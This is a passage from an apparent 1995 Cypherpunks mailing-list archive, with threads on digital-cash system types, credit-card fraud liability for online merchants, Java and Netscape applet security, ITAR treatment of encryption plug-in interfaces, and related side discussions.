        A. Credit-card based systems such as credit card number encryption
and First Virtual.
        B. Partially privacy-protecting systems such as ecash.
        C. Fully privacy-protecting systems with the characteristics
described above, based on a governmental currency.
        D. Fully privacy-protecting systems with the characteristics
described above, based on a privately-produced currency and backed by the
issuer.
        I suspect that the first and second will have the most aboveground
chance of succeeding, given likely governmental interference in the third
and fourth; lack of public comprehension of all of the digital cash
systems and of privately-produced currency will impede some of them also.
However, the fourth may be a possibility for an "underground" currency
system, to be used among computer-literate individuals with an aversion
to government. I am currently creating an idea for a system of the fourth
type, and will put it on the exi-essay list when it is complete.
Incidentally, I suspect a privately-produced currency system may be
harder to regulate than a governmentally-produced currency system,
especially if the former is set up properly. I will explain further about
this idea in the aforementioned exi-essay system.
---------------

I have more interesting things to do, personally, than to be a pioneer so
I can then have nothing to sell, and little to buy....when "interesting
markets" start to appear, I'll look at it again.

In any case, I wish all the pioneers well, and am happy to see Lucky
Green's involvement.
---------------
        I also agree in wishing the "pioneers" well. The ecash system is
definitely preferable to one based on means such as credit cards.
        -Allen





From ac at hawk.twinds.com  Thu Nov 16 15:20:28 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Fri, 17 Nov 1995 07:20:28 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511161930.LAA20815@software.net>
Message-ID: <Pine.HPP.3.91.951116152854.21342B-100000@hawk.twinds.com>


In this context is the merchant defined as the the corporation selling the
physical good for delivery or the corporation that is operating the server?
These two parties under certain circumstances may be the same party, but 
in this example lets assume they are seperate entities.

If I am interpreting "internet based stores" in the proper context, the 
cardholder and the bank have recourse against the company operating the 
server.  Is this correct?  

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."

On Thu, 16 Nov 1995, John Pettitt wrote:

> At 10:48 AM 11/16/95 -0800, Vladimir Z. Nuri wrote:
> >
>         ... about credit card liability
> 
> Hmmm, a few words about credit card liabilty.
> 
> The situation now is that in a "card not present" transaction the merchant is
> liable for the fraud.  This means that *a lot* of internet based stores are 
> getting eaten alive by fraud.  The big issue right now is not cards being
> stolen from the telco switch (yes it's a risk but can anybody cite it
> happening?).
> The issue is authentication of the card user.  We have a significant
> investment in 
> AI / credit scoring code to defeat the wannabe crackers.  This goes way beyond
> mod 10 checks and address verification.
> 
> [ as an aside I've put two people in jail this year for card fraud ]
> 
> John
> John Pettitt, jpp at software.net
> VP Engineering, CyberSource Corporation, 415 473 3065
> 
> 





From hallam at w3.org  Thu Nov 16 15:31:12 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 17 Nov 1995 07:31:12 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511161930.LAA20815@software.net>
Message-ID: <9511162041.AA03234@zorch.w3.org>



>The situation now is that in a "card not present" transaction the merchant is
>liable for the fraud.  This means that *a lot* of internet based stores are 
>getting eaten alive by fraud.

This is not quite accurate. In the US there is that distinction, in the UK
the credit card co is responsible. For that reason the requirement that
goods be delivered to the billing address _ONLY_ is strictly enforced.


>[ as an aside I've put two people in jail this year for card fraud ]

Good to hear that!

	Phill





From habs at warwick.com  Thu Nov 16 16:23:02 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Fri, 17 Nov 1995 08:23:02 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <199511162114.QAA11306@cmyk.warwick.com>


> The best thing to do if you want to implement your own
> intra-corporation security model in the short run is to get a copy of
> the beta source code, and take a look at AppletSecurity.java and
> AppletClassLoader.java.  You can substitute your own versions of those
> for your inhouse use.  This is relatively easy to do with the
> appletviewer, and although it's possible to do some binary hack on
> moz2_0.car and replace certain files with your own, it's probably not
> everyone's cup of tea.  I mean, there's a difference between what you
> can do, and what you want to do ... I understand that!


The real question here I had was.. can this be done in Netscape..
I know it can be done in HotJava.






From fc at all.net  Thu Nov 16 16:23:04 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Fri, 17 Nov 1995 08:23:04 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <9511162108.AA08466@all.net>


> 3.  Postscript considered dangerous:   (insert-smiley) 
> 
> As for the question of someone invoking a postscript interpreter via a
> browser and thus opening up their system to some rogue postscript
> file: I think it would be great if either of these two things were to
> magically happen:
> 
> 	1) people would stop putting postscript docs on web pages
> 	because it's the wrong technology for WWW - it wastes
> 	bandwidth - it's hard to view & hence often ugly - everyone
> 	just prints it out anyway and then complains because there
> 	is no one "standard" implementation of postscript printing
> 	worldwide and there are dozens of minor problems
> 
> 	2) someone could implement a secure postscript previewer
> 	(whatever that means!) 
> 
> I doubt either of those two things will happen.  The average Jo on the
> internet needs to understand that when s/he downloads binary files
> over the internet and run them from insecure programs on their local
> computer, well, s/he runs some risk.  This risk might be tiny, but
> it's impossible to quantify loss.  If I lose a poem that I'm writing,
> to me that's priceless, so I do not intend to imply that loss of data
> isn't tragic for the person who loses it.  If you have data you can't
> bear to lose, be sure to practice safe computing.  Perform backups
> regularly, and use judgement about which interpreters and executable
> programs you allow to run on your PC.
> 
> Marianne

It seems clear from this that Netscape, or at least Marianne who seems
to speak for Netscpe, doesn't understand the protection issues that my
clients face.  I will nevertheless forward this official Netscape line
to them so they can better understand why I tell them it is insecure.

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From sjb at universe.digex.net  Thu Nov 16 16:29:40 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Fri, 17 Nov 1995 08:29:40 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <m0tFpbT-0008yaC@pacifier.com>
Message-ID: <199511162113.QAA08492@universe.digex.net>


jim bell writes:
>>jim bell writes:
>>>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>>>(1), (2), (3), (4) and (5) of this category;"
>>>
>>>Question:  What makes computers in general NOT describable by such a
>>>paragraph?!?
>>
>>The referenced paragraphsdescribe cryptographic hardware, software and
>>technical data.  Computers in general are not "specifically designed"
>>as cryptographic equipment.
>
>Great!  Then you must merely ensure that there is at least one
>(non-encryption) program around that can use the same hooks.

The problem is that the non-encryption program must use the same
interface as the encryption program.  Text compression is often cited
as an example of a non-encryption program that can use the same hooks
as a compression program, but there's a key difference:  the text
compressor *doesn't* need a key.

The encryption tool would have an interface like
    Boolean (*)( DataSource, DataSink, void*);

A compressor written to the same interface would never need to touch
that third argument.  Therefore, the second argument is "specifically
designed" to permit an encryption tool to be used.

You'd need a program which not only *accepted* the additional parameter,
but also *needed* the second parameter.  I confess I have some difficulty
thinking of one.





From mrm at netcom.com  Thu Nov 16 16:46:45 1995
From: mrm at netcom.com (Marianne Mueller)
Date: Fri, 17 Nov 1995 08:46:45 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <199511162123.NAA06232@netcom20.netcom.com>


Hi Dr Cohen -

I work for Sun, and I don't speak for Netscape!     I do my best
to post messages that are accurate and that can be substantiated,
but that is not the same as being an official spokesperson. 

I think reasonable people can disagree on the dangers of
postscript interpreters.  I do not dismiss your concerns - I was
 merely pointing out that the fix may be simply not to run a postscript
interpreter.  That decision is made by a user, not by a web browser. 

Marianne
Java Products Group  (this is the name of teh Java group at Sun)
Sun Microsystems, Inc. 





From ac at hawk.twinds.com  Thu Nov 16 16:50:49 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Fri, 17 Nov 1995 08:50:49 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511161848.KAA06931@netcom3.netcom.com>
Message-ID: <Pine.HPP.3.91.951116143115.21342A-100000@hawk.twinds.com>


Vladimir:
Calm down.  This is why I started my post with "Maybe this is stupidly
obvious question but....."  I am trying to illustrate some simple points
and ask some simple questions:

1. Risk to a cardholder is on a vastly different scale than risk to the Bank 
Consortiums that run the credit card business. Charge offs and fraud
are of course as you point out a cost of doing business.  If it is not an 
acceptable risk to the card holder and the bank it won't happen.  The bank
won't deploy a system that they view as exposing them to unacceptable loss.
The cardholder will not use a system that offers him no recourse to recover
losses. End of Story.  

2. The Bank Consortiums are doing a poor job of explaining to cardholders
merchants and developers such as you and me that are supposed to
implement these "open" specs exactly *what* our risks are in developing and
deploying these systems on our servers. The bank consortiums will have 
contracts or usage agreements governing the clearing of transactions in 
cyberspace.   When a loss is claimed by a cardholder, how will the loss
(if there is one) be allocated between the cardholder, merchant, the company
operating the server that processed the credit card and the bank be 
allocated.  

3.  I'm getting tired of seeing posts this list about what is more dangerous
cyberspace or restaurantspace.  Let's focus on the real mechanics of how
the ground rules of credit card clearing will operate in cyberspace. The
credit card consortiums can advance the cause of electronic commerce by
stating in unambigous terms what their views are of these ground rules.
Developers, cardholders and merchants can then make a judgement on whether
those risks are acceptable to each party respectively.  

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."






From attila at primenet.com  Fri Nov 17 08:56:00 1995
From: attila at primenet.com (attila)
Date: Fri, 17 Nov 95 08:56:00 PST
Subject: e$: Mandarins, Lifers, and Talents
In-Reply-To: <v02120d0eacd1b471dc1d@[199.0.65.105]>
Message-ID: <Pine.BSD.3.91.951117162855.9415B-100000@usr5.primenet.com>



   one point to add to the discussion of pioneers, "evangelists" and 
"prophets" in this thread:

   1.  they were all ahead of the curve --yes, they were visionaries. 
       almost all were pushed aside as it became a "business."

   2.  most were pioneers: a specific example is Bob Norris who walked
       out of a Fairchild board meeting being being rejected for his 
       eighth try at replacing Germanium because the first seven had
       failed. A couple of VCs, among them Arthur Rock and Bob Perring
       said: "...we believe you, let's try silicon..." and we have Intel.  

       But, who drives Intel today? --Grove, who is labelled as the
       founder.  Grove made the _business_ -the brains have been 
       forgotten. Norris was the darling of the VCs for a couple years
       until they figured he couldn't spot a _financial_ success.

This same scenario was repeated at Apple, and hundreds of others. Grove
was an exception to the rule that the startup management, quite often
including developers, is replaced by plain vanilla suits. Why even the
evangalistic and prophetical developers?  --because they don't deviate
from their vision to comply with the soley profit oriented modes of the
new marketeers. 

I look at it this way: our nation runs on _money_, whether we like it or 
not (I don't). Money for the sake of money is evil money as it gives 
nothing in return, particularly when everything is to be produced as 
cheaply as possible for more profit to the money folks.

Reminds of two excellent quotes from John Ruskin:

 "He who buys for price alone is this man's lawful prey."

 "The price of oats is significantly lower after processing by the horse." 

I write code because I enjoy it -even it is addictive.

	flick

-------------------------------------------------------------------------
On Thu, 16 Nov 1995, Robert Hettinga wrote:

> >It really did not happen because of cheerleaders. This is a recurring
> >belief of mine, notably in my occasional interactions with the nanotech
> >community, as a few members of this list can attest to. The "Rah, Rah"s--no
> >pun intended--play a minor role in adoption of new products and
> >technologies.
> 
> Tim, you can't tell me that there weren't people who were just plain fired
> up about the prospects for any really serious technology. Where are you
> living, the Gernsbeck Continuum? Tim, those "cheerleaders" are the ones who
> either get fired up to do something themselves, or if they can't, they get
> people either fired up to buy stuff, or fired up to build stuff. Howard
> Hughes was one. Hell, the Wright brothers were. So are you, Tim, only your
> passion is strong crypto and cryptoanarchy. Mine is this geodesic market
> stuff...
> 
> 
> >One argument I am never persuaded by is the hackerish "Feh." (Does anybody
> >but hackers use this strange word?)
> 
> Ah. Well, Tim, "Feh" is yiddish, actually. Just like "hacker" comes from
> electric trains. If you don't believe me on *that* one, ask Mr. Levy, who
> knows all about the MIT Model Railroading Club...
> 
> >In any case, I'm not interested in "doing better than that." My support for
> >Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
> >Money, or E-Purse, of Digibux, or whatever, well, I'm not a merchant. Just
> >as one could study flight, to use Bob's example, without operating a
> >passenger service or a flying school, so one can be interested in digital
> >cash without "opening an account."
> 
> Right on, Tim. Just don't rain on my parade, or anyone else who's trying to
> make something happen, for that matter.
> 
> 
> >Ah, but I never claimed otherwise (perhaps this is what you mean by "your
> >nonexistant point"). My point was only that digital cash will happen mostly
> >when it fills a need, or is accepted by customers, not by cheerleading and
> >by urging people on this list to be pioneers.
> 
> Cart before the horse, Tim. Most of the new people (say, for 2 years at
> least) on this list *are* pioneers. I've got 600 people over on www-buyinfo
> who are there primarily because 90% (!) of the traffic on it is my
> e$-filtered cross-posts from cypherpunks, and I don't know how many are
> over here because they like their whiskey neat. Those people are so fired
> up, they will find a need, or *create* one, if they have to.
> 
> >The theories about mandarins, lifers, and talents I'll discuss at another
> >time, maybe. All I'll say is that I think it's too simple a categorization.
> >Maybe it's a Boston viewpoint.
> 
> Damn Yankees. Born in El Paso, myself, by way of St. Thomas, Las Cruces,
> Corpus Christi, El Paso, Anchorage, St. Louis, Mid-MO, Chicago, and yes,
> Boston. Never knew I was one until you told me...
> 
> >The folks I've worked with over the years
> >bear almost no resemblance to any of these categories.
> 
> Typical Mandarin response. ;-). (just pulling your leg, Tim. Put the Glock
> *down*...)
> 
> >In any case, people
> >will start using digital cash if and when it fulfills some need, or some
> >need they never knew they had, gets stimulated.
> 
> Agreed.
> 
> >
> >On a personal note--which is weird, since 1000 or more people may be
> >reading this message, though most probably haven't read this far--I think
> >it best not to get too emotionally attached to some particular outcome in
> >the introduction of a new technology.
> 
> I bet they are, but I'm not attached to Mark Twain or even Digicash per se.
> It just seems to me, that if you want to get involved in this flying stuff,
> here's a plane that flies, even if its elevators are stuck on the front.
> Learn to fly now, and be able to fly the new stuff as it becomes available.
> If you want to fly, that is. Some people then couldn't help it. They *had*
> to do it. That's what's happening here, Tim.
> 
> >I've seen many "prophets" wailing to the world that their
> >visions _deserve_ success.
> 
> Not here Tim. I believe you might be projecting, or something. I just want
> to sell stuff for cash on the net. Then, I want to surfact the financial
> markets into little tiny pieces...
> 
> >The technologies which hit the right chord rarely need, or benefit from,
> >the "evangelists" and "cheerleaders." The Macintosh did not Guy Kawasaki or
> >any of the other so-called evangelists to succeed. The microprocessor did
> >not evangelists. The airplane did not. The VCR did not. The cellular phone
> >did not.
> 
> I don't believe that for a minute, and on reflection, you probably don't
> either. Jerry Sanders at AMD. Hell, Tim, you knew Moore, for god's sake.
> Think about, oh, the Sony guy, whatever his name is, Morita. The people who
> built the Mac were *possessed*. So was Kawasaki. I'm *still* possessed.
> What about the *entrepreneur's* reality distortion field. I bet you've seen
> more than a few, and probably more than a few who were right, or you
> wouldn't be thrashing your Mac on the net and clipping coupons...
> 
> 
> >And I can think immediately of several
> >technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
> >Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
>                                                                 ^^^^^
> >enthusiasts--but in which progress has been stalled or proceeded along
> ^^^^^^^^^^^^
> >different paths for different reasons.
> 
> I resemble that remark. Sure, Tim some of them didn't make it. But for
> every one of those (strange you should mention Jobs, right after I mention
> the reality distortion field, and don't count him out yet, rumor has it
> Ellison wants him to run Apple when Oracle buys it, god help us all), there
> are others who did exactly that. Von Braun, or Porsche, or, hell, all I can
> think of are germans, uh, okay, Bill Gates.
> 
> >This is a very interesting area for me, and I used to write extensively
> >about it. Nick Szabo and I had several debates about this, a couple of
> >years ago. However, no time now to discuss the full implications here.
> 
> Having been hammered by Nick myself, once or twice, I think I understand this...
> 
> So. I'm enthused. My enthusiasm is demonstrably contagious. If someone gets
> enthusiastic about all this on my account, and puts up the king-hell,
> world-beater, financial-cryptography-killer-ap that's cool by me.
> Otherwise, it's only bandwidth, which I've wasted enough on for this
> thread. If you want to make the rubble bounce, go for it.
> 
> Besides, I usually stay in my cage, these days. Which is where I'm going to
> go and lurk for another month or so...
> 
> Cheers,
> Bob Hettinga
> 
> PS: Feh
> 
> -----------------
> Robert Hettinga (rah at shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
> "Reality is not optional." --Thomas Sowell
> The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
> >>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<
> 
> 






From rah at shipwright.com  Thu Nov 16 16:58:52 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 08:58:52 +0800
Subject: e$: Mandarins, Lifers, and Talents
Message-ID: <v02120d07acd12fd83388@[199.0.65.105]>


>Bob, let me do a minor vent here.

Fine, Tim. Vent away. In a minor key, even.

>You are critical of E. Allen Smith's viewpoint, and essentially question
>whether he has anything to sell. Not much of an argument.

It's a damn good argument, which I'll get to in a minute. It was just done
rudely, and for that I apologise to the list.

What I got was a reactionary flame which had nothing to do with the
(admittedly flag-waving) post I put up, which I should have ignored, but
instead I responded with a reactionary flame of my own, which got me a
reactionary flame from a Senior Member of the List, one with Maximum
Reputation... It has been ever thus, for those of you who've been around
here since I showed up a year ago last April. I just can't seem to color
inside the lines, as far as Dr. May is concerned.

>1. I'm not selling anything, and won't sign up just for "moral support."

I believe that was my point, Tim. You're *not* selling anything. I was
sending a message to people out there who *are*. People who are, or are
going to, use non-certificate payment methods, like credit cards, and who,
if they're subscribed to this list, should be clueful enough to do this and
know why they should do it. Besides that, it's free. Until Friday. ;-).

>2. I wish Mark Twain Bank well, but the success of the kinds of digital
>cash we hope to see will not likely hinge on the success of one particular
>operations, such as MTB.

Nope. But if people completely ignored the Wright Brothers, would Curtiss
have entered the market? (An interesting example, as the Wrights sued
Curtiss for patent enfringement and lost, I think.)

>3. The success of BankAmericard (later renamed Visa) came when real
>customers and real shops started to use it, not when early pioneers set
>themselves up as clearinghouses and whatnot.

I am talking about real shops. With real customers. I bet you haven't even
looked at the list of shops yet. What I'm planning to do is to offer
subscriptions and sponsorships of the e$ lists we're putting up on an ecash
server. Putting my money where my mouth is. Literally.

>I have more interesting things to do, personally, than to be a pioneer so I
>can then have nothing to sell, and little to buy....when "interesting
>markets" start to appear, I'll look at it again.

This is a straw man, Tim. Actually, it's post hoc. "If we had some ham, we
could have some ham and eggs, if we had some eggs." or, "If we lived here,
we'd be home now." Feh. You can do better than that. I've seen you do it.

But, to answer your nonexistant point, yes, people *are* starting to sell
things on the net. We know that the best way to do that in the long run is
with cash, and with other digital bearer certificate technologies. Not just
because these methods are secure. Not because they allow anonymity. They're
just starting to, and when they've been accepted in the market, they will
be nothing else but. All we need is a scenario where the digital cash
underwriter relies upon the ATM system for validation of identity, and the
second an anonymous bank account uses the underwriter, we have totally
anonymous digital cash. We're very close here.

>But when you urge people to be pioneers, and they express reservations or
>doubts about the system, attacking their motives or implying they have
>nothing to sell anyway is not too helpful.

Yes. it was rude. I apologise both to the list, to Dr. May, and to (soon to
be Dr.) Mr. Smith. Mostly for stopping discussion with a thinly veiled
insult.

>Just my views, but, then, I don't have any customers either.

Which brings me to my real point, here. Why I used an informal fallacy of
my own, and lashed out with an ad hominem attack against someone with an
.edu domain on their e-mail address, after they dissed something I think is
a good idea, at least for a start.

So, why did I do this? I didn't understand it at the time, but it's
probably class warfare. :-).

I just heard something on an NPR(!) talkshow with a guy talking about his
book about the three power group of american culture. It used to be what he
called the "episcopacy", the Groton-Harvard-State Department types who
ruled both government and the guts of American business until say, the
depression and World War II.  These people were there primarily there
because their families were there. They were "the nice people of Boston"
that Rose Kennedy had so many problems with. In 1953, say, it may interest
you to know, that the standardized test scores for Harvard were the same as
those for the population at large. George Bush was one of these, but so was
FDR.

Nowadays, this guy says, (I can't remember who he is, but he wrote a book
about it, so we'll find out soon enough), we have *three* power elites in
this country.

The first class is the class he called the "mandarins". These people have
inherited most of the trappings, and titles, of the old episcopacy. These
are people who tested well, who were typically plucked from obscurity to go
to the best schools, and go on to places like Harvard, where the scores are
now way above average, and is now pretty much pure meritocracy as far as
admission is concerned, political correctness aside. Mandarins go on to get
advanced degrees. Camille Paglia, Milton Friedman, Carl Sagan, Billary
Clinton are all mandarins.  This is good. The best and the brightest get
the best educations. They're also the people who start things like the Viet
Nam war, and the welfare state.

The second class are the "lifers". These people who go to state schools,
get uninspired grades, and spend their working lives in the same
institution. Colin Powell, most Fortune 500 CEOS circa 1983, Lyndon Johnson
and Bob Dole are lifers.

The third class are "talents". Newt, and Edison, and most computer or
internet entrepreneurs are talents, especially if they have no formal
computer science training except what they taught themselves.

Like any set of categories, nobody is exclusively one class or another,
except that credentialism has allowed mandarins to capture the cultural
flag for the time being. Einstein and Whit Diffie are talents who got
mandarin credentials. Richard Stallman is a talent who will probably get
mandarin credentials posthumously.;-). Bill Gates is a proto-mandarin who
figured out he was a talent. Sloan was a talent with mandarin credentials
who created a whole industry full of lifers.

Pioneers tend to be talents, Tim.  They tend to talk in generalities, and
not color between the lines. They tend to make up rules as they go along,
and sometimes, like Mr. Bill, they create rules the rest of us have to
follow whether we want to or not.

One of my messier theories about the internet is that it was invented by
mandarins. Now the talents, the people you call pioneers, have moved in,
and they're much more pragmatic, and have little patience for crystalline
perfection, because inefficiency and chaos is where they find beauty, joy,
and all those other nasty imprecise concepts. When thing settle down a bit,
the lifers will come.  They're trying to do it now, by building sites like
www.time.com, or buying into sites like www.wired.com.

Even though you're an iconoclast, Tim, I couldn't help but think of you and
the proto-Dr. Smith as mandarins when I got you're response to my post. I
was trying to shout over your heads to all the talents out there trying to
make money on the net.

Even though you may think of yourself as a mountain man -- or maybe a
cowboy -- watching the settlers come, I feel more like I've upset the
decorum by hollering in the faculty tea room. Having embarrassed myself
that way, I'll try not to do it again. Because, oddly enough, we need each
other.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From aleph1 at dfw.net  Fri Nov 17 08:58:54 1995
From: aleph1 at dfw.net (Aleph One)
Date: Fri, 17 Nov 95 08:58:54 PST
Subject: SA: Confidential Communication on the Internet
In-Reply-To: <199511171627.LAA17236@fuseki.aa.ans.net>
Message-ID: <Pine.SUN.3.90.951117105324.3208A-100000@dfw.net>


No I think you did. The main point I guess was that there system acomplished
athentication, as well as privacy. But like I said lite on the technical 
side. And I agree, it spent more time talking about what it encryption,
public keys exchange, and certificates, than answering what diferent in 
their system than any of the otehr out there.

 On Fri, 17 Nov 1995, michael shiplett wrote:

>   This seemed to be a duplication of an X.509 certificate hierarchy:
> ``Hey, I don't know who you are but you have a seals which go back to
> a CA I trust.'' In this respect the information seemed unworthy of an
> article in SA.
> 
> Perhaps I did not read the article closely enough?
> 
> michael
> 

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From rsalz at osf.org  Thu Nov 16 17:09:25 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 17 Nov 1995 09:09:25 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511162235.AA18129@sulphur.osf.org>


Status: R
>as a compression program, but there's a key difference:  the text
>compressor *doesn't* need a key.

Sure, 12 14 16, etc., bits as in the classic unix compress program.

>The encryption tool would have an interface like
>    Boolean (*)( DataSource, DataSink, void*);
>
>A compressor written to the same interface would never need to touch
>that third argument.  Therefore, the second argument is "specifically
>designed" to permit an encryption tool to be used.

Not at all.  coyping inbuf to output is a common practice, it's quite
rare that you often compress in-place.
	/r$





From Andrew.Spring at ping.be  Thu Nov 16 17:15:46 1995
From: Andrew.Spring at ping.be (Andrew Spring)
Date: Fri, 17 Nov 1995 09:15:46 +0800
Subject: Public Domain?
Message-ID: <v01510103acd15b8b72af@[193.74.216.47]>




>But the researchers backed out of the idea on the advice of our patent
>lawyers.  The reasoning goes like this:  Sending anything over the Internet
>is equivalent to placing it into the public domain, since the message can
>be viewed by other than the intended recipient.  So, proprietary
>information *even encrypted* will be rendered unpatentable if sent over the
>Internet.
>

You may want to send these guys back to do their homework.  For corporate
communications, crypto is not new.  Messages have been sent in cipher over
telegraph lines since the civil war.  Ask if a trade secret becomes exposed
(in the legal sense) if it is transmitted over telegraph lines in code.

I fail to see what the difference is between enciphering something in dots
and dashes and enciphering it in 1's and 0's.







From fluffy at shout.net  Fri Nov 17 09:21:33 1995
From: fluffy at shout.net (Chris Stillson)
Date: Fri, 17 Nov 95 09:21:33 PST
Subject: Crypto++ port for Macintosh
Message-ID: <199511171701.LAA30608@duracef.shout.net>


I have started to port your crypto++ librairied to mac, using
metrowerks.  I was just wondering if you would like a copy
of it when I finished?

All in all, a very interesting set of classes.

Chris







From mark at unicorn.com  Thu Nov 16 17:25:44 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Fri, 17 Nov 1995 09:25:44 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <Pine.3.89.9511162243.A5545-0100000@unicorn.com>


On Thu, 16 Nov 1995, Scott Brickner wrote:

> You'd need a program which not only *accepted* the additional parameter,
> but also *needed* the second parameter.  I confess I have some difficulty
> thinking of one.

How about command-line compression options. Gzip, for example, allows you
to specify how good you want the compression to be, with better
compression taking longer. So you could justify passing a set of options
to the compression algorithm, which could also be used to pass key 
information to the encryption algorithm. In fact, you could pass in a 
void * pointer to options that had been set up in a preferences panel in 
the application, which would be provided by the plug-in compression or 
encryption code. That structure could then have anything you wanted in it.

Also, I'm not sure you'd need to pass a key, surely the encryption code 
could do all the key-handling itself ?

	Mark






From dreschs at mpd.tandem.com  Thu Nov 16 17:30:39 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Fri, 17 Nov 1995 09:30:39 +0800
Subject: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115184015.18971A-100000@chivalry>
Message-ID: <199511162204.QAA02889@galil.austnsc.tandem.com>


"Vladimir Z. Nuri" <vznuri at netcom.com> said:

>> Card Imprints taken with no online authorisation are typically
>> charged a transaction fee of 3-6%: with authorisation, 1.5-3%.  ATM
>> card transactions are charged at around $0.10 per transaction.

VZN> are you saying that a typical mail order credit card transaction
VZN> has a 3-6% charge, because the card is not physically present?

	No, s/he was talking about merchants who verify that you have
the credit available (online authorization) vs those who trust you to
have it (no online authorization).  As I understand it, the fee is
'insurance' that the merchant will be paid - as long as there is no
fraud on the part of the merchant, it will receive payment, even if the
charge was invalid, because the card was canceled/stolen/over limit/etc.
The lower charge for online authorization is because when the charge
comes back approved, the CC company is able to verify that the credit is
there.  This isn't foolproof (2 separate charges, each under the
available credit, can be approved even if the total exceeds the
available credit), but it's more than the offline merchants can do.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From jya at pipeline.com  Thu Nov 16 17:39:25 1995
From: jya at pipeline.com (John Young)
Date: Fri, 17 Nov 1995 09:39:25 +0800
Subject: GHO_mac
Message-ID: <199511162229.RAA29474@pipe8.nyc.pipeline.com>


   The Sciences, November/December, 1995


   Another realm of explosive population increase is in
   cyberspace, a phenomenon taken up in this issue with Sherry
   Turkle's "Ghosts in the Machine." Here the growth comes
   about not only in the traditional way but also in wildly
   non-traditional ways. People multiply themselves on the
   Internet, grafting various aspects of their personalities
   onto distinct characters. Even more unsettling, as Turkle
   wittily documents the matter, is that the Net is populated
   with "bots": robot sentence-parsing engines that can do
   fair impersonations of real people, often well enough to
   (provisionally) pass Alan M. Turing's test for machine
   consciousness. Do you really know who -- or what -- you're
   talking to?

   The future of all this is murky and mind-boggling:
   Information-seeking bots even now can tie up sites on the
   World-Wide Web. Bots impersonating people share chat groups
   with other bots, much the way telephone answering machines
   now "talk" to each other. Internet chatter gets so dense
   that bandwidth and other Net resources become strained: the
   site at the Los Alamos National Laboratory now
   (automatically) warns robots away with a chilling threat to
   "initiate automated 'seek and destroy' " action against the
   machine from which the robot seems to be launched. A
   conservative reaction may already be setting in, determined
   to have users identify, encrypt and authenticate every
   packet of information they send across the Net.

   Net fatigue becomes a recognized medical syndrome; Net
   detox centers spring up; Net warfare breaks out; Net
   starvation becomes a recognized social problem; Net
   demagogues undermine local democracies....

   How many people can the Net support? -- Peter Brown, Editor

   -----

   For "Ghost in the Machine" by Sherry Turkle, a professor of
   the sociology of science at the Massachusetts Institute of
   Technology. The article is adapted from her forthcoming
   book, *Life on the Screen: Identity in the Age of the
   Internet*, which is being published in November by Simon &
   Schuster:

   GHO_mac (16 kb)



... later this evening, that is.










From wiltship at iccu6.ipswich.gil.com.au  Thu Nov 16 17:41:46 1995
From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Fri, 17 Nov 1995 09:41:46 +0800
Subject: Need advice on video
Message-ID: <199511162222.JAA05710@iccu6.ipswich.gil.com.au>


-----BEGIN PGP SIGNED MESSAGE-----

Ben wrote...

<stuff deleted>
>What I'm fishing for here are any suggestions for ways to present
>some of this content in an interesting video setting.  We've already
>decided on doing some algorithm animation, and maybe some simple
>moving graphics illustrating the various protocols.  Any ideas you
>might have would be appreciated.

Firstly you will need to clearly define for yourself exactly what you want the
audience to know by the end of the programme... the content.  And what you 
want them to feel by the end of the programme too.. you obviously want them 
to have positive feelings about crypto.  You might also consider some broader 
political issues to be cleanly interwoven through the script too.

Then, you might like to think about the WHO, WHEN, WHERE and WHY of crypto.  
A bit of an historical background on cyphers would put todays crypto into 
context, too.  Make sure that you keep giving the audience enough knowledge
to comprehend stuff you will be presenting towards the end of the video...
all of the
information you present needs to build on what you have already presented.

Closely examine your scripts for jargon.  Take out any that you can't
explain clearly.
